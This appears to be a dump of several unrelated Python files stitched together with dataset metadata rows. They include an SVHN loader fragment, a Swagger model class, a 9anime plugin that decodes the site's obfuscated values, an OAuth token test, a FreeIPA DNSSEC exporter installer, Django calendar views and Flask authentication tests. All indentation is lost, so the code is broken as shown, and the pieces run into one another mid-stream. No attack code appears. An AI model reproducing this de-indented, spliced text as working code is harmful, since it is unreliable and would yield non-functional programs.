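# index files under splits/svhn, uses the plain "test" split otherwise, and
# resolves n_workers="n_cores" to multiprocessing.cpu_count().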
def load_svhn_infer(split: str, batch_size: int, n_workers: Union[str, int]) -> DataLoader:
if split not in {"train", "val", "test"}:
raise ValueError("Split must be 'train', 'val', or 'test'!")
if batch_size <= 0:
raise ValueError("Batch_size must be positive!")
if type(n_workers) == str and n_workers != "n_cores":
raise ValueError("If n_workers is a string, it must be 'n_cores'!")
if type(n_workers) == int and n_workers < 0:
raise ValueError("If n_workers is an int, it must be non-negative!")
transform = transforms.ToTensor()
if split == "train":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "train.txt"), int)
dataset = Subset(dataset, indices)
elif split == "val":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "val.txt"), int)
dataset = Subset(dataset, indices)
else:
dataset = torchvision.datasets.SVHN(DATA_DIRPATH, split="test", transform=transform, download=True)
if n_workers == "n_cores":
n_workers = multiprocessing.cpu_count()
return DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=n_workers)
| apache-2.0 | -1,984,148,229,769,911,600 | 41.387755 | 107 | 0.672123 | false |
janinko/pnc-cli | pnc_cli/swagger_client/models/build_set_status_changed_event.py | 1 | 10705 | # coding: utf-8
"""
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from datetime import datetime
from pprint import pformat
from six import iteritems
import re
class BuildSetStatusChangedEvent(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'description': 'str',
'user_id': 'int',
'build_set_start_time': 'datetime',
'build_set_end_time': 'datetime',
'old_status': 'str',
'build_set_task_id': 'int',
'build_set_configuration_name': 'str',
'new_status': 'str',
'build_set_configuration_id': 'int'
}
attribute_map = {
'description': 'description',
'user_id': 'userId',
'build_set_start_time': 'buildSetStartTime',
'build_set_end_time': 'buildSetEndTime',
'old_status': 'oldStatus',
'build_set_task_id': 'buildSetTaskId',
'build_set_configuration_name': 'buildSetConfigurationName',
'new_status': 'newStatus',
'build_set_configuration_id': 'buildSetConfigurationId'
}
def __init__(self, description=None, user_id=None, build_set_start_time=None, build_set_end_time=None, old_status=None, build_set_task_id=None, build_set_configuration_name=None, new_status=None, build_set_configuration_id=None):
"""
BuildSetStatusChangedEvent - a model defined in Swagger
"""
self._description = None
self._user_id = None
self._build_set_start_time = None
self._build_set_end_time = None
self._old_status = None
self._build_set_task_id = None
self._build_set_configuration_name = None
self._new_status = None
self._build_set_configuration_id = None
if description is not None:
self.description = description
if user_id is not None:
self.user_id = user_id
if build_set_start_time is not None:
self.build_set_start_time = build_set_start_time
if build_set_end_time is not None:
self.build_set_end_time = build_set_end_time
if old_status is not None:
self.old_status = old_status
if build_set_task_id is not None:
self.build_set_task_id = build_set_task_id
if build_set_configuration_name is not None:
self.build_set_configuration_name = build_set_configuration_name
if new_status is not None:
self.new_status = new_status
if build_set_configuration_id is not None:
self.build_set_configuration_id = build_set_configuration_id
@property
def description(self):
"""
Gets the description of this BuildSetStatusChangedEvent.
:return: The description of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this BuildSetStatusChangedEvent.
:param description: The description of this BuildSetStatusChangedEvent.
:type: str
"""
self._description = description
@property
def user_id(self):
"""
Gets the user_id of this BuildSetStatusChangedEvent.
:return: The user_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""
Sets the user_id of this BuildSetStatusChangedEvent.
:param user_id: The user_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._user_id = user_id
@property
def build_set_start_time(self):
"""
Gets the build_set_start_time of this BuildSetStatusChangedEvent.
:return: The build_set_start_time of this BuildSetStatusChangedEvent.
:rtype: datetime
"""
return self._build_set_start_time
@build_set_start_time.setter
def build_set_start_time(self, build_set_start_time):
"""
Sets the build_set_start_time of this BuildSetStatusChangedEvent.
:param build_set_start_time: The build_set_start_time of this BuildSetStatusChangedEvent.
:type: datetime
"""
self._build_set_start_time = build_set_start_time
@property
def build_set_end_time(self):
"""
Gets the build_set_end_time of this BuildSetStatusChangedEvent.
:return: The build_set_end_time of this BuildSetStatusChangedEvent.
:rtype: datetime
"""
return self._build_set_end_time
@build_set_end_time.setter
def build_set_end_time(self, build_set_end_time):
"""
Sets the build_set_end_time of this BuildSetStatusChangedEvent.
:param build_set_end_time: The build_set_end_time of this BuildSetStatusChangedEvent.
:type: datetime
"""
self._build_set_end_time = build_set_end_time
@property
def old_status(self):
"""
Gets the old_status of this BuildSetStatusChangedEvent.
:return: The old_status of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._old_status
@old_status.setter
def old_status(self, old_status):
"""
Sets the old_status of this BuildSetStatusChangedEvent.
:param old_status: The old_status of this BuildSetStatusChangedEvent.
:type: str
"""
allowed_values = ["NEW", "DONE", "REJECTED"]
if old_status not in allowed_values:
raise ValueError(
"Invalid value for `old_status` ({0}), must be one of {1}"
.format(old_status, allowed_values)
)
self._old_status = old_status
@property
def build_set_task_id(self):
"""
Gets the build_set_task_id of this BuildSetStatusChangedEvent.
:return: The build_set_task_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._build_set_task_id
@build_set_task_id.setter
def build_set_task_id(self, build_set_task_id):
"""
Sets the build_set_task_id of this BuildSetStatusChangedEvent.
:param build_set_task_id: The build_set_task_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._build_set_task_id = build_set_task_id
@property
def build_set_configuration_name(self):
"""
Gets the build_set_configuration_name of this BuildSetStatusChangedEvent.
:return: The build_set_configuration_name of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._build_set_configuration_name
@build_set_configuration_name.setter
def build_set_configuration_name(self, build_set_configuration_name):
"""
Sets the build_set_configuration_name of this BuildSetStatusChangedEvent.
:param build_set_configuration_name: The build_set_configuration_name of this BuildSetStatusChangedEvent.
:type: str
"""
self._build_set_configuration_name = build_set_configuration_name
@property
def new_status(self):
"""
Gets the new_status of this BuildSetStatusChangedEvent.
:return: The new_status of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._new_status
@new_status.setter
def new_status(self, new_status):
"""
Sets the new_status of this BuildSetStatusChangedEvent.
:param new_status: The new_status of this BuildSetStatusChangedEvent.
:type: str
"""
allowed_values = ["NEW", "DONE", "REJECTED"]
if new_status not in allowed_values:
raise ValueError(
"Invalid value for `new_status` ({0}), must be one of {1}"
.format(new_status, allowed_values)
)
self._new_status = new_status
@property
def build_set_configuration_id(self):
"""
Gets the build_set_configuration_id of this BuildSetStatusChangedEvent.
:return: The build_set_configuration_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._build_set_configuration_id
@build_set_configuration_id.setter
def build_set_configuration_id(self, build_set_configuration_id):
"""
Sets the build_set_configuration_id of this BuildSetStatusChangedEvent.
:param build_set_configuration_id: The build_set_configuration_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._build_set_configuration_id = build_set_configuration_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
elif isinstance(value, datetime):
result[attr] = str(value.date())
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, BuildSetStatusChangedEvent):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | 8,449,749,185,241,655,000 | 30.028986 | 233 | 0.598972 | false |
DxCx/plugin.video.9anime | resources/lib/ui/NineAnimeUrlExtender.py | 1 | 3603 | import re
from string import ascii_lowercase as lc, ascii_uppercase as uc, maketrans
class NineAnimeUrlExtender:
# _TS_MAP_TABLE = [i for i in uc if ord(i) % 2 != 0] + [i for i in uc if ord(i) % 2 == 0]
_CUSB64_MAP_TABLE = [i for i in lc if ord(i) % 2 != 0] + [i for i in lc if ord(i) % 2 == 0]
_ts_value_regex = re.compile(ur"<html.*data-ts\s*=[\"]([^\"]+?)[\"]")
_server_value_regex = \
re.compile(ur"\<div\sclass=\"widget-title\"\>\s(.+?)\s\<\/div\>")
_active_server_regex = \
re.compile(ur"\<span\sclass=\"tab active\"\sdata-name=\"(\d+)\".+?")
def __init__(self):
pass
@classmethod
def decode_info(cls, obj):
newObj = {}
for key, value in obj.iteritems():
if type(value) is unicode or type(value) is str:
if value.startswith('.'):
newObj[key] = cls._rot_string(value[1:])
if value.startswith('-'):
newObj[key] = cls._cusb64_string(value[1:])
else:
newObj[key] = value
elif type(value) is dict:
newObj[key] = cls.decode_info(value)
else:
newObj[key] = value
return newObj
@classmethod
def get_server_value(cls, content):
servers = cls._server_value_regex.findall(content)[0]
active_server = cls._active_server_regex.findall(servers)
if len(active_server) != 1:
raise Exception("Cant extract server id")
return int(active_server[0], 10)
@classmethod
def get_ts_value(cls, content):
ts_value = cls._ts_value_regex.findall(content)[0]
return ts_value
# return cls._decode_ts_value(ts_value)
@classmethod
def _rot_string(cls, content):
RotBy = 8
lookup = maketrans(lc + uc, lc[RotBy:] + lc[:RotBy] + uc[RotBy:] + uc[:RotBy])
decoded = str(content).translate(lookup)
return decoded
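    # Example (added, illustrative): _rot_string is a fixed rotation by 8
    # within each case, e.g. "abc" -> "ijk" and "XYZ" -> "FGH"; digits and
    # punctuation pass through unchanged.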
# @classmethod
# def _decode_ts_value(cls, ts):
# decoded = ""
# for c in ts:
# replaced = False
# if c not in cls._TS_MAP_TABLE:
# decoded += c
# continue
# decoded += uc[cls._TS_MAP_TABLE.index(c)]
# missing_padding = len(decoded) % 4
# if missing_padding:
# decoded += b'=' * (4 - missing_padding)
# return decoded.decode("base64")
@classmethod
def _cusb64_string(cls, content):
decoded = ""
for c in content:
replaced = False
if c not in cls._CUSB64_MAP_TABLE:
decoded += c
continue
decoded += lc[cls._CUSB64_MAP_TABLE.index(c)]
missing_padding = len(decoded) % 4
if missing_padding:
decoded += b'=' * (4 - missing_padding)
return decoded.decode("base64")
@classmethod
def get_extra_url_parameter(cls, id, server, ts):
DD = 'bfcad671'
params = [
('id', str(id)),
('ts', str(ts)),
('server', str(server)),
]
o = cls._s(DD)
for i in params:
o += cls._s(cls._a(DD + i[0], i[1]))
return o
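    # Added note (hedged): the integer returned above acts as the request
    # "token": _s() sums character codes, _a() mixes each parameter with the
    # constant DD into a hex string, and those per-parameter sums are added to
    # _s(DD). It is presumably sent alongside id/ts/server when requesting
    # episode sources; the exact query-parameter name is not shown here.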
@classmethod
def _s(cls, t):
i = 0
for (e, c) in enumerate(t):
i += ord(c) + e
return i
@classmethod
def _a(cls, t, e):
n = 0
for i in range(max(len(t), len(e))):
n *= ord(e[i]) if i < len(e) else 8
n *= ord(t[i]) if i < len(t) else 8
return format(n, 'x') # convert n to hex string
| gpl-3.0 | -6,710,349,284,111,533,000 | 30.605263 | 95 | 0.502914 | false |
martincochran/score-minion | oauth_token_manager_test.py | 1 | 2779 | #!/usr/bin/env python
#
# Copyright 2014 Martin Cochran
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import test_env_setup
from google.appengine.ext import testbed
import oauth_token_manager
class OauthTokenManagerTest(unittest.TestCase):
def setUp(self):
"""Stub out the datastore so we can test it."""
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_memcache_stub()
self.testbed.init_datastore_v3_stub()
def tearDown(self):
self.testbed.deactivate()
def testMockManager(self):
token_manager = oauth_token_manager.OauthTokenManager(is_mock=True)
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
# Ensure we didn't actually touch the data store.
account_query = oauth_token_manager.ApiSecret.query(
ancestor=oauth_token_manager.api_secret_key()).order(
-oauth_token_manager.ApiSecret.date_added)
oauth_secrets = account_query.fetch(10)
self.assertEquals(0, len(oauth_secrets))
def testDatastoreBackedManager(self):
token_manager = oauth_token_manager.OauthTokenManager()
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,579,290,179,118,641,000 | 30.224719 | 74 | 0.721123 | false |
ofayans/freeipa | ipaserver/install/odsexporterinstance.py | 1 | 6389 | #
# Copyright (C) 2014 FreeIPA Contributors see COPYING for license
#
import os
import pwd
import grp
import ldap
from ipaserver.install import service
from ipaserver.install import installutils
from ipapython.ipa_log_manager import root_logger
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.constants import constants
from ipaplatform.paths import paths
from ipaplatform import services
from ipalib import errors, api
class ODSExporterInstance(service.Service):
def __init__(self, fstore=None):
super(ODSExporterInstance, self).__init__(
"ipa-ods-exporter",
service_desc="IPA OpenDNSSEC exporter daemon",
fstore=fstore,
keytab=paths.IPA_ODS_EXPORTER_KEYTAB,
service_prefix=u'ipa-ods-exporter'
)
self.ods_uid = None
self.ods_gid = None
self.enable_if_exists = False
suffix = ipautil.dn_attribute_property('_suffix')
def create_instance(self, fqdn, realm_name):
self.backup_state("enabled", self.is_enabled())
self.backup_state("running", self.is_running())
self.fqdn = fqdn
self.realm = realm_name
self.suffix = ipautil.realm_to_suffix(self.realm)
try:
self.stop()
except Exception:
pass
# checking status step must be first
self.step("checking status", self.__check_dnssec_status)
self.step("setting up DNS Key Exporter", self.__setup_key_exporter)
self.step("setting up kerberos principal", self.__setup_principal)
self.step("disabling default signer daemon", self.__disable_signerd)
self.step("starting DNS Key Exporter", self.__start)
self.step("configuring DNS Key Exporter to start on boot", self.__enable)
self.start_creation()
def __check_dnssec_status(self):
try:
self.ods_uid = pwd.getpwnam(constants.ODS_USER).pw_uid
except KeyError:
raise RuntimeError("OpenDNSSEC UID not found")
try:
self.ods_gid = grp.getgrnam(constants.ODS_GROUP).gr_gid
except KeyError:
raise RuntimeError("OpenDNSSEC GID not found")
def __enable(self):
try:
self.ldap_enable('DNSKeyExporter', self.fqdn, None,
self.suffix)
except errors.DuplicateEntry:
root_logger.error("DNSKeyExporter service already exists")
def __setup_key_exporter(self):
installutils.set_directive(paths.SYSCONFIG_IPA_ODS_EXPORTER,
'SOFTHSM2_CONF',
paths.DNSSEC_SOFTHSM2_CONF,
quotes=False, separator='=')
def __setup_principal(self):
assert self.ods_uid is not None
for f in [paths.IPA_ODS_EXPORTER_CCACHE, self.keytab]:
try:
os.remove(f)
except OSError:
pass
installutils.kadmin_addprinc(self.principal)
# Store the keytab on disk
installutils.create_keytab(paths.IPA_ODS_EXPORTER_KEYTAB,
self.principal)
p = self.move_service(self.principal)
if p is None:
# the service has already been moved, perhaps we're doing a DNS reinstall
dns_exporter_principal_dn = DN(
('krbprincipalname', self.principal),
('cn', 'services'), ('cn', 'accounts'), self.suffix)
else:
dns_exporter_principal_dn = p
# Make sure access is strictly reserved to the ods user
os.chmod(self.keytab, 0o440)
os.chown(self.keytab, 0, self.ods_gid)
dns_group = DN(('cn', 'DNS Servers'), ('cn', 'privileges'),
('cn', 'pbac'), self.suffix)
mod = [(ldap.MOD_ADD, 'member', dns_exporter_principal_dn)]
try:
self.admin_conn.modify_s(dns_group, mod)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
except Exception as e:
root_logger.critical("Could not modify principal's %s entry: %s"
% (dns_exporter_principal_dn, str(e)))
raise
# limit-free connection
mod = [(ldap.MOD_REPLACE, 'nsTimeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsSizeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsIdleTimeout', '-1'),
(ldap.MOD_REPLACE, 'nsLookThroughLimit', '-1')]
try:
self.admin_conn.modify_s(dns_exporter_principal_dn, mod)
except Exception as e:
root_logger.critical("Could not set principal's %s LDAP limits: %s"
% (dns_exporter_principal_dn, str(e)))
raise
def __disable_signerd(self):
signerd_service = services.knownservices.ods_signerd
if self.get_state("singerd_running") is None:
self.backup_state("singerd_running", signerd_service.is_running())
if self.get_state("singerd_enabled") is None:
self.backup_state("singerd_enabled", signerd_service.is_enabled())
# disable default opendnssec signer daemon
signerd_service.stop()
signerd_service.mask()
def __start(self):
self.start()
def remove_service(self):
try:
api.Command.service_del(self.principal)
except errors.NotFound:
pass
def uninstall(self):
if not self.is_configured():
return
self.print_msg("Unconfiguring %s" % self.service_name)
# just eat states
self.restore_state("running")
self.restore_state("enabled")
# stop and disable service (IPA service, we do not need it anymore)
self.disable()
self.stop()
# restore state of dnssec default signer daemon
signerd_enabled = self.restore_state("singerd_enabled")
signerd_running = self.restore_state("singerd_running")
signerd_service = services.knownservices.ods_signerd
signerd_service.unmask()
# service was stopped and disabled by setup
if signerd_enabled:
signerd_service.enable()
if signerd_running:
signerd_service.start()
installutils.remove_keytab(self.keytab)
installutils.remove_ccache(ccache_path=paths.IPA_ODS_EXPORTER_CCACHE)
| gpl-3.0 | 3,183,045,108,307,513,300 | 33.535135 | 85 | 0.594929 | false |
k-team/KHome | modules/co_sensor/local_module.py | 1 | 1375 | #-*- coding: utf-8 -*-
import module
from module import use_module
import fields
class COSensor(module.Base):
update_rate = 1000
public_name = 'Capteur CO'
alarm = use_module('Alarm')
class co(fields.sensor.CO,
fields.syntax.Numeric,
fields.io.Graphable,
fields.persistant.Database,
fields.Base):
update_rate = 60
public_name = 'Taux de CO (ppm)'
class limit_value_co(
fields.syntax.Numeric,
fields.io.Readable,
fields.persistant.Database,
fields.Base):
public_name = 'Limite CO (ppm)'
init_value = 5.00
class message_co(
fields.syntax.String,
fields.io.Readable,
fields.io.Writable,
fields.persistant.Database,
fields.Base):
public_name = 'Message d\'alerte CO'
init_value = 'Au #secours il y a la masse de #CO #YOLO #pompier'
class security(fields.Base):
update_rate = 60
def always(self):
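            # Added comment: each poll reads the latest CO sample, the alert
            # threshold and the alert text; TypeError is swallowed while any of
            # those fields has no value yet, otherwise the Alarm module gets the
            # message whenever the reading exceeds the threshold.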
try:
sensor = self.module.co()[1]
lie = self.module.limit_value_co()[1]
message = self.module.message_co()[1]
except TypeError:
pass
else:
if sensor > lie:
self.module.alarm.message(message)
| mit | 4,025,652,573,530,431,000 | 26.5 | 72 | 0.531636 | false |
imposeren/django-happenings | happenings/views.py | 1 | 10237 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
# python lib:
from datetime import date, timedelta
# django:
from django.db.models.functions import ExtractHour
from django.views.generic import ListView, DetailView
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.utils.dates import MONTHS_ALT
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
# thirdparties:
import six
# happenings:
from .models import Event
from .utils.displays import month_display, day_display
from .utils.next_event import get_next_event
from .utils.mixins import JSONResponseMixin
from .utils import common as c
URLS_NAMESPACE = getattr(settings, "CALENDAR_URLS_NAMESPACE", 'calendar')
class GenericEventView(JSONResponseMixin, ListView):
model = Event
def render_to_response(self, context, **kwargs):
self.postprocess_context(context)
if self.request.is_ajax():
return self.render_to_json_response(context, **kwargs)
return super(GenericEventView, self).render_to_response(
context, **kwargs
)
def get_context_data(self, **kwargs):
context = super(GenericEventView, self).get_context_data(**kwargs)
self.net, self.category, self.tag = c.get_net_category_tag(
self.request
)
if self.category is not None:
context['cal_category'] = self.category
if self.tag is not None:
context['cal_tag'] = self.tag
return context
def postprocess_context(self, context, *args, **kwargs):
return
class EventMonthView(GenericEventView):
template_name = 'happenings/event_month_list.html'
def get_year_and_month(self, net, qs, **kwargs):
"""
Get the year and month. First tries from kwargs, then from
querystrings. If none, or if cal_ignore qs is specified,
sets year and month to this year and this month.
"""
now = c.get_now()
year = now.year
month = now.month + net
month_orig = None
if 'cal_ignore=true' not in qs:
if 'year' and 'month' in self.kwargs: # try kwargs
year, month_orig = map(
int, (self.kwargs['year'], self.kwargs['month'])
)
month = month_orig + net
else:
try: # try querystring
year = int(self.request.GET['cal_year'])
month_orig = int(self.request.GET['cal_month'])
month = month_orig + net
except Exception:
pass
# return the year and month, and any errors that may have occurred do
# to an invalid month/year being given.
return c.clean_year_month(year, month, month_orig)
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventMonthView, self).get_context_data(**kwargs)
qs = self.request.META['QUERY_STRING']
year, month, error = self.get_year_and_month(self.net, qs)
# add a dict containing the year, month, and month name to the context
current = dict(
year=year, month_num=month, month=MONTHS_ALT[month][:3]
)
context['current'] = current
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month_and_year'] = u"%(month)s, %(year)d" % (
{'month': display_month, 'year': year}
)
if error: # send any year/month errors
context['cal_error'] = error
all_month_events = list(
self.get_month_events(
year, month, self.category, self.tag, loc=True, cncl=True
).annotate(
start_hour=ExtractHour('start_date')
).order_by('start_hour')
)
context['raw_all_month_events'] = all_month_events
context['show_events'] = False
if getattr(settings, "CALENDAR_SHOW_LIST", False):
context['show_events'] = True
context['events'] = c.order_events(all_month_events, d=True) \
if self.request.is_ajax() else c.order_events(all_month_events)
return context
def postprocess_context(self, context, *args, **kwargs):
qs = self.request.META['QUERY_STRING']
mini = True if 'cal_mini=true' in qs else False
start_day = getattr(settings, "CALENDAR_START_DAY", 0)
# get any querystrings that are not next/prev/year/month
if qs:
qs = c.get_qs(qs)
if getattr(settings, "CALENDAR_PASS_VIEW_CONTEXT_TO_DISPLAY_METHOD", False):
month_display_base_context = dict(context)
month_display_base_context.pop('events', None)
else:
month_display_base_context = None
all_month_events = context['raw_all_month_events']
context['calendar'] = month_display(
context['current']['year'],
context['current']['month_num'],
all_month_events,
start_day,
self.net,
qs,
mini,
request=self.request,
base_context=month_display_base_context,
)
class EventDayView(GenericEventView):
template_name = 'happenings/event_day_list.html'
def get_calendar_back_url(self, year, month_num):
self.request.current_app = self.request.resolver_match.namespace
if URLS_NAMESPACE:
view_name = URLS_NAMESPACE + ':list'
else:
view_name = 'list'
return reverse(view_name, args=(year, month_num), current_app=self.request.current_app)
def check_for_cancelled_events(self, d):
"""Check if any events are cancelled on the given date 'd'."""
for event in self.events:
for cn in event.cancellations.all():
if cn.date == d:
event.title += ' (CANCELLED)'
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventDayView, self).get_context_data(**kwargs)
kw = self.kwargs
y, m, d = map(int, (kw['year'], kw['month'], kw['day']))
year, month, day, error = c.clean_year_month_day(y, m, d, self.net)
if error:
context['cal_error'] = error
# Note that we don't prefetch 'cancellations' because they will be
# prefetched later (in day_display in displays.py)
all_month_events = self.get_month_events(
year, month, self.category, self.tag
)
self.events = day_display(
year, month, all_month_events, day
)
self.check_for_cancelled_events(d=date(year, month, day))
context['events'] = self.events
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month'] = display_month
context['month_num'] = month
context['year'] = year
context['day'] = day
context['month_day_year'] = u"%(month)s %(day)d, %(year)d" % (
{'month': display_month, 'day': day, 'year': year}
)
context['calendar_back_url'] = self.get_calendar_back_url(year, month)
# for use in the template to build next & prev querystrings
context['next'], context['prev'] = c.get_next_and_prev(self.net)
return context
class EventDetailView(DetailView):
model = Event
context_object_name = 'event'
def get_object(self):
return get_object_or_404(
Event.objects.prefetch_related(
'location', 'categories', 'tags', 'cancellations'
),
pk=self.kwargs['pk']
)
def get_cncl_days(self):
now = c.get_now()
cncl = self.object.cancellations.all()
return [(x.date, x.reason) for x in cncl if x.date >= now.date()]
def check_cncl(self, d):
cncl = self.object.cancellations.all()
return True if [x for x in cncl if x.date == d] else False
def get_context_data(self, **kwargs):
now = c.get_now()
context = super(EventDetailView, self).get_context_data(**kwargs)
e = self.object
for choice in Event.REPEAT_CHOICES:
if choice[0] == e.repeat:
context['repeat'] = choice[1]
context['cncl_days'] = self.get_cncl_days()
event = [e] # event needs to be an iterable, see get_next_event()
if not e.repeats('NEVER'): # event is ongoing; get next occurrence
if e.will_occur(now):
year, month, day = get_next_event(event, now)
next_event = date(year, month, day)
context['next_event'] = date(year, month, day)
context['next_or_prev_cncl'] = self.check_cncl(next_event)
else: # event is finished repeating; get last occurrence
end = e.end_repeat
last_event = end
if e.repeats('WEEKDAY'):
year, month, day = c.check_weekday(
end.year, end.month, end.day, reverse=True
)
last_event = date(year, month, day)
context['last_event'] = last_event
context['next_or_prev_cncl'] = self.check_cncl(last_event)
else:
if e.is_chunk():
# list of days for single-day event chunk
context['event_days'] = ( # list comp
(e.l_start_date + timedelta(days=x))
for x in range(e.start_end_diff + 1)
)
else:
# let template know if this single-day, non-repeating event is
# cancelled
context['this_cncl'] = self.check_cncl(e.l_start_date.date())
return context
| bsd-2-clause | 1,189,771,832,417,715,700 | 34.058219 | 95 | 0.57722 | false |
starduliang/haha | tests/test_api.py | 1 | 8798 | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
from flask import url_for, jsonify
from haha.user.models import User, BlacklistToken
from .factories import UserFactory
import time
class TestRegistering:
"""Register a user."""
def test_auth_registration(self, user, testapp):
""" Test for user registration """
res = testapp.post_json(url_for('auth.register'), dict(username='foo',email='[email protected]',password='123456')) # '/api/auth/register'
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully registered.'
assert data['auth_token']
assert res.content_type == 'application/json'
assert int(res.status_code) == 201
def test_registered_with_already_registered_user(self, user, testapp):
""" Test registration with already registered email"""
user = User.create(
username='duliang',
email='[email protected]',
password='test'
)
res = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'User already exists. Please Log in.'
assert res.content_type == 'application/json'
assert int(res.status_code) == 202
def test_registered_user_login(self, user, testapp):
""" Test for login of registered-user login """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# registered user login
res = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')))
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully logged in.'
assert data['auth_token']
assert res.content_type == 'application/json'
assert int(res.status_code) == 200
class TestAuthentication:
"""test auth module."""
def test_non_registered_user_login(self, user, testapp):
""" Test for login of non-registered user """
res = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*") # use status="*" to allow any status_code, refer to: http://docs.pylonsproject.org/projects/webtest/en/1.4.3/
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'User does not exist.'
assert res.content_type == 'application/json'
assert int(res.status_code) == 404
def test_user_status(self, user, testapp):
""" Test for user status """
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
auth_token = str(data_register['auth_token']) # convert type from unicode to string, else assertion error occurs
res = testapp.get(url_for('auth.status'), headers=dict(Authorization='Bearer ' + auth_token))
data = res.json
assert data['status'] == 'success'
assert data['data'] is not None
assert data['data']['email'] == '[email protected]'
assert int(res.status_code) == 200
def test_valid_logout_before_token_expires(self, user, testapp):
""" Test for logout before token expires """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
